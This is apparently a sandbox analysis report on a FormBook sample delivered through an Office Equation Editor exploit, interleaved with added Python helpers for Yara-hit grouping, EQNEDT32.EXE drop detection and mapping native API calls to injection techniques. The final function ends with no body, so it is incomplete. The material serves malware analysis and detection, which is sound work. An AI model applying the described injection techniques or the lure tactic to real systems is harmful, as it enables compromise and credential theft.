Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
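The seven MEMORY-type matches above are identified only by their Joe Sandbox dump names. As an added example, not part of the report, the following Python splits those names into their fields and groups the hits per process, reading the fifth field as the Windows PAGE_* protection value. That reading is an assumption about the naming scheme, not something the report states, but it is consistent with every dump listed on this page: the FormBook code hits in processes 5 and 7 sit in 0x40 (execute, read, write) regions, which is what code unpacked in place looks like, while the single hit in process 4 is a plain read-write region.

```python
import re
from collections import defaultdict

# Joe Sandbox memory-dump identifier as it appears in the Yara list above:
#   <process index>.<phase>.<dump id>.<base address>.<protection>.<memory type>.sdmp
# The protection field is interpreted as the Windows PAGE_* constant
# (0x04 PAGE_READWRITE, 0x40 PAGE_EXECUTE_READWRITE, ...). That mapping is an
# assumption about the naming scheme, not a documented fact from the report.
DUMP_RE = re.compile(
    r"^(\d{8})\.(\d{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)
PAGE_NAMES = {0x01: "NOACCESS", 0x02: "READONLY", 0x04: "READWRITE", 0x08: "WRITECOPY",
              0x10: "EXECUTE", 0x20: "EXECUTE_READ", 0x40: "EXECUTE_READWRITE",
              0x80: "EXECUTE_WRITECOPY"}

def parse_dump_name(name):
    """Split one .sdmp identifier into its fields; raise on anything else."""
    m = DUMP_RE.match(name)
    if m is None:
        raise ValueError(f"not a Joe Sandbox dump identifier: {name!r}")
    return {
        "process": int(m.group(1)),
        "phase": int(m.group(2)),
        "dump_id": int(m.group(3)),
        "base": int(m.group(4), 16),
        "protect": int(m.group(5), 16) & 0xFF,   # drop PAGE_GUARD/NOCACHE modifier bits
        "mem_type": int(m.group(6), 16),
    }

def is_wx(protect):
    """True for pages that are both writable and executable."""
    return protect in (0x40, 0x80)

def yara_hits_by_process(names):
    """Group dump identifiers by process and tag each region with its W+X status.
    Returns {process: [(base, PAGE_* name, wx), ...]} with regions sorted by base."""
    grouped = defaultdict(list)
    for n in names:
        d = parse_dump_name(n)
        grouped[d["process"]].append(
            (d["base"], PAGE_NAMES.get(d["protect"], hex(d["protect"])), is_wx(d["protect"]))
        )
    return {p: sorted(v) for p, v in grouped.items()}

# The seven MEMORY-type hits from the "Yara detected FormBook" list above.
FORMBOOK_HITS = [
    "00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp",
    "00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp",
    "00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp",
    "00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp",
    "00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp",
    "00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp",
    "00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp",
]

if __name__ == "__main__":
    for proc, regions in sorted(yara_hits_by_process(FORMBOOK_HITS).items()):
        for base, prot, wx in regions:
            print(f"process {proc}: base {base:#010x} {prot:<18} {'W+X' if wx else ''}")
```

The 0x40 regions in help.exe (process 7) at 0x100000 and 0x200000 are where the injected copy lives; the 0x100000 base lines up with the 5.2.vbc.exe.400000.0.unpack hit, and the "Code function" listing later in this report shows the same functions at 0x0041xxxx in vbc.exe and 0x0011xxxx in help.exe, i.e. the same module relocated by 0x300000.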

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Content from the yellow bar above Q 16 , 17 18 :496$ J6'KvC 19 20 21 5 ( 5690 ( 2
Source: Screenshot number: 8 Screenshot OCR: Enable Content from the yellow bar above Q 16 , 17 18 :496$ J6'KvC 19 20 21 5 ( 5690 ( 2
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xles[1].exe Jump to dropped file
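The two drops above, together with the "Office equation editor starts processes" signature in the summary, are the observable side of the Equation Editor exploit: EQNEDT32.EXE has no legitimate reason to write executables or to spawn anything. As an added example, not part of the report or of any Sigma rule, the Python below applies that logic to constructed Sysmon-shaped events (EventID 11 = FileCreate, EventID 1 = ProcessCreate). The three malicious events mirror the report's own paths; the EXCEL.EXE path and the benign control event are made up.

```python
import ntpath

EQNEDT32 = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"

# Constructed Sysmon-shaped events, not real telemetry. The first three follow
# the two file drops listed above and the "Office equation editor starts
# processes" signature; the last is a benign control (Excel saving a workbook).
EVENTS = [
    {"EventID": 11, "Image": EQNEDT32,
     "TargetFilename": r"C:\Users\Public\vbc.exe"},
    {"EventID": 11, "Image": EQNEDT32,
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xles[1].exe"},
    {"EventID": 1, "ParentImage": EQNEDT32, "Image": r"C:\Users\Public\vbc.exe"},
    {"EventID": 11, "Image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "TargetFilename": r"C:\Users\user\Documents\Processed APR12.xlsx"},
]

EXECUTABLE_EXT = {".exe", ".dll", ".scr", ".com", ".pif", ".cpl"}
# World-writable roots that every user can execute from; the report's vbc.exe
# drop lands in the first one ("Drops PE files to the user root directory").
WORLD_WRITABLE_ROOTS = (r"c:\users\public", r"c:\programdata")

def _base(path):
    return ntpath.basename(path).lower()

def _is_pe_path(path):
    return ntpath.splitext(path)[1].lower() in EXECUTABLE_EXT

def eqnedt32_alerts(events):
    """Flag every file written or process started by the Equation Editor.
    Returns (severity, reason, path) triples. Executable drops, drops into
    world-writable roots and child processes are 'high'; any other write by
    EQNEDT32.EXE is still reported, at 'medium'."""
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 11 and _base(ev.get("Image", "")) == "eqnedt32.exe":
            target = ev["TargetFilename"]
            if _is_pe_path(target) or target.lower().startswith(WORLD_WRITABLE_ROOTS):
                alerts.append(("high", "executable dropped by Equation Editor", target))
            else:
                alerts.append(("medium", "file written by Equation Editor", target))
        elif eid == 1 and _base(ev.get("ParentImage", "")) == "eqnedt32.exe":
            alerts.append(("high", "process started by Equation Editor", ev["Image"]))
    return alerts

if __name__ == "__main__":
    for severity, reason, path in eqnedt32_alerts(EVENTS):
        print(f"[{severity}] {reason}: {path}")
```

Two caveats when turning this into a production rule. EQNEDT32.EXE is an out-of-process COM server started by the DCOM launcher, so its parent is svchost.exe rather than EXCEL.EXE; a rule keyed on Excel spawning children never sees the drop, which is why the rule has to key on EQNEDT32.EXE itself as the image or parent. And since Microsoft removed the Equation Editor component from Office in 2018, on a patched estate the mere presence of a running EQNEDT32.EXE is itself worth an alert.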
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D042D0 NtQueryInformationProcess, 4_2_00D042D0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D042C8 NtQueryInformationProcess, 4_2_00D042C8
Source: C:\Users\Public\vbc.exe Code function: 5_2_004181B0 NtCreateFile, 5_2_004181B0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418260 NtReadFile, 5_2_00418260
Source: C:\Users\Public\vbc.exe Code function: 5_2_004182E0 NtClose, 5_2_004182E0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418390 NtAllocateVirtualMemory, 5_2_00418390
Source: C:\Users\Public\vbc.exe Code function: 5_2_004182AC NtReadFile, 5_2_004182AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041838B NtAllocateVirtualMemory, 5_2_0041838B
Source: C:\Users\Public\vbc.exe Code function: 5_2_009200C4 NtCreateFile,LdrInitializeThunk, 5_2_009200C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00920048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00920048
Source: C:\Users\Public\vbc.exe Code function: 5_2_00920078 NtResumeThread,LdrInitializeThunk, 5_2_00920078
Source: C:\Users\Public\vbc.exe Code function: 5_2_009207AC NtCreateMutant,LdrInitializeThunk, 5_2_009207AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091F9F0 NtClose,LdrInitializeThunk, 5_2_0091F9F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091F900 NtReadFile,LdrInitializeThunk, 5_2_0091F900
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_0091FAD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_0091FAE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_0091FBB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_0091FB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0091FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0091FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FD8C NtDelayExecution,LdrInitializeThunk, 5_2_0091FD8C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_0091FDC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_0091FEA0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_0091FED0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0091FFB4
Source: C:\Users\Public\vbc.exe Code function: 5_2_009210D0 NtOpenProcessToken, 5_2_009210D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00920060 NtQuerySection, 5_2_00920060
Source: C:\Users\Public\vbc.exe Code function: 5_2_009201D4 NtSetValueKey, 5_2_009201D4
Source: C:\Users\Public\vbc.exe Code function: 5_2_0092010C NtOpenDirectoryObject, 5_2_0092010C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00921148 NtOpenThread, 5_2_00921148
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091F8CC NtWaitForSingleObject, 5_2_0091F8CC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00921930 NtSetContextThread, 5_2_00921930
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091F938 NtWriteFile, 5_2_0091F938
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FAB8 NtQueryValueKey, 5_2_0091FAB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FA20 NtQueryInformationFile, 5_2_0091FA20
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FA50 NtEnumerateValueKey, 5_2_0091FA50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FBE8 NtQueryVirtualMemory, 5_2_0091FBE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FB50 NtCreateKey, 5_2_0091FB50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FC30 NtOpenProcess, 5_2_0091FC30
Source: C:\Users\Public\vbc.exe Code function: 5_2_00920C40 NtGetContextThread, 5_2_00920C40
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FC48 NtSetInformationFile, 5_2_0091FC48
Source: C:\Users\Public\vbc.exe Code function: 5_2_00921D80 NtSuspendThread, 5_2_00921D80
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FD5C NtEnumerateKey, 5_2_0091FD5C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FE24 NtWriteVirtualMemory, 5_2_0091FE24
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FFFC NtCreateProcessEx, 5_2_0091FFFC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FF34 NtQueueApcThread, 5_2_0091FF34
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A00C4 NtCreateFile,LdrInitializeThunk, 7_2_007A00C4
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A07AC NtCreateMutant,LdrInitializeThunk, 7_2_007A07AC
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079F900 NtReadFile,LdrInitializeThunk, 7_2_0079F900
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079F9F0 NtClose,LdrInitializeThunk, 7_2_0079F9F0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_0079FAE8
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_0079FAD0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FAB8 NtQueryValueKey,LdrInitializeThunk, 7_2_0079FAB8
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_0079FB68
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FB50 NtCreateKey,LdrInitializeThunk, 7_2_0079FB50
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_0079FBB8
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_0079FC60
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_0079FDC0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FD8C NtDelayExecution,LdrInitializeThunk, 7_2_0079FD8C
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_0079FED0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FFB4 NtCreateSection,LdrInitializeThunk, 7_2_0079FFB4
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A0078 NtResumeThread, 7_2_007A0078
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A0060 NtQuerySection, 7_2_007A0060
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A0048 NtProtectVirtualMemory, 7_2_007A0048
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A10D0 NtOpenProcessToken, 7_2_007A10D0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A1148 NtOpenThread, 7_2_007A1148
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A010C NtOpenDirectoryObject, 7_2_007A010C
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A01D4 NtSetValueKey, 7_2_007A01D4
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079F8CC NtWaitForSingleObject, 7_2_0079F8CC
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079F938 NtWriteFile, 7_2_0079F938
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A1930 NtSetContextThread, 7_2_007A1930
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FA50 NtEnumerateValueKey, 7_2_0079FA50
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FA20 NtQueryInformationFile, 7_2_0079FA20
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FBE8 NtQueryVirtualMemory, 7_2_0079FBE8
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FC48 NtSetInformationFile, 7_2_0079FC48
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A0C40 NtGetContextThread, 7_2_007A0C40
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FC30 NtOpenProcess, 7_2_0079FC30
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FC90 NtUnmapViewOfSection, 7_2_0079FC90
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FD5C NtEnumerateKey, 7_2_0079FD5C
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A1D80 NtSuspendThread, 7_2_007A1D80
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FE24 NtWriteVirtualMemory, 7_2_0079FE24
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FEA0 NtReadVirtualMemory, 7_2_0079FEA0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FF34 NtQueueApcThread, 7_2_0079FF34
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FFFC NtCreateProcessEx, 7_2_0079FFFC
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_001181B0 NtCreateFile, 7_2_001181B0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00118260 NtReadFile, 7_2_00118260
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_001182E0 NtClose, 7_2_001182E0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00118390 NtAllocateVirtualMemory, 7_2_00118390
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_001182AC NtReadFile, 7_2_001182AC
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011838B NtAllocateVirtualMemory, 7_2_0011838B
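Two things in the listing above can be checked mechanically rather than by eye: which combinations of native calls each process contains (the hollowing, thread-context and APC signatures in the summary come from such combinations), and the fact that the same functions appear in vbc.exe (process 5) and help.exe (process 7) at addresses that differ by a constant, which is what an injected copy of the same code looks like. The Python below is an added example, not part of the report: a parser for the "Code function" lines, fed with a verbatim excerpt of the listing. The technique groupings are illustrative minimal sets, not Joe Sandbox's signature logic.

```python
import re
from collections import Counter, defaultdict

# Excerpt of the "Code function" lines above for process 5 (vbc.exe, running the
# unpacked payload) and process 7 (help.exe, the process it was injected into).
# Copied from the report; it is a subset of the listing, not all of it.
REPORT_LINES = r"""
Source: C:\Users\Public\vbc.exe Code function: 5_2_004181B0 NtCreateFile, 5_2_004181B0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418390 NtAllocateVirtualMemory, 5_2_00418390
Source: C:\Users\Public\vbc.exe Code function: 5_2_009200C4 NtCreateFile,LdrInitializeThunk, 5_2_009200C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00920078 NtResumeThread,LdrInitializeThunk, 5_2_00920078
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0091FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0091FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0091FFB4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00921930 NtSetContextThread, 5_2_00921930
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FC30 NtOpenProcess, 5_2_0091FC30
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FE24 NtWriteVirtualMemory, 5_2_0091FE24
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FFFC NtCreateProcessEx, 5_2_0091FFFC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FF34 NtQueueApcThread, 5_2_0091FF34
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A00C4 NtCreateFile,LdrInitializeThunk, 7_2_007A00C4
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_0079FC60
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FFB4 NtCreateSection,LdrInitializeThunk, 7_2_0079FFB4
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A0078 NtResumeThread, 7_2_007A0078
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007A1930 NtSetContextThread, 7_2_007A1930
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FC30 NtOpenProcess, 7_2_0079FC30
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FC90 NtUnmapViewOfSection, 7_2_0079FC90
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FE24 NtWriteVirtualMemory, 7_2_0079FE24
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FF34 NtQueueApcThread, 7_2_0079FF34
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0079FFFC NtCreateProcessEx, 7_2_0079FFFC
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_001181B0 NtCreateFile, 7_2_001181B0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00118390 NtAllocateVirtualMemory, 7_2_00118390
"""

# Matches "<proc>_<phase>_<addr> <api>[,<api>...], <proc>_<phase>_<addr>".
LINE_RE = re.compile(
    r"Code function: (\d+)_(\d+)_([0-9A-Fa-f]{8}) ([A-Za-z0-9_,]+?),? \1_\2_\3\s*$"
)

def parse_code_functions(text):
    """Return {process index: [(address, [api, ...]), ...]} from report lines."""
    funcs = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            funcs[int(m.group(1))].append((int(m.group(3), 16), m.group(4).split(",")))
    return dict(funcs)

# Minimal Nt* sets behind the injection signatures the report raises. These are
# illustrative groupings, not Joe Sandbox's own signature logic.
TECHNIQUES = {
    "process hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
    "section mapping injection": {"NtCreateSection", "NtMapViewOfSection", "NtOpenProcess"},
    "APC injection": {"NtQueueApcThread", "NtOpenProcess"},
}

def injection_techniques(funcs):
    """Per process, the techniques whose complete Nt* set that process calls."""
    result = {}
    for proc, entries in funcs.items():
        called = {apis[0] for _, apis in entries}   # first name is the Nt* call itself
        result[proc] = sorted(t for t, need in TECHNIQUES.items() if need <= called)
    return result

def relocation_deltas(funcs, a, b):
    """Pair functions of process a and b by (API, low 16 bits of address) and
    count the address deltas. Each distinct delta is one module present in both
    processes at a different base, i.e. the same code relocated."""
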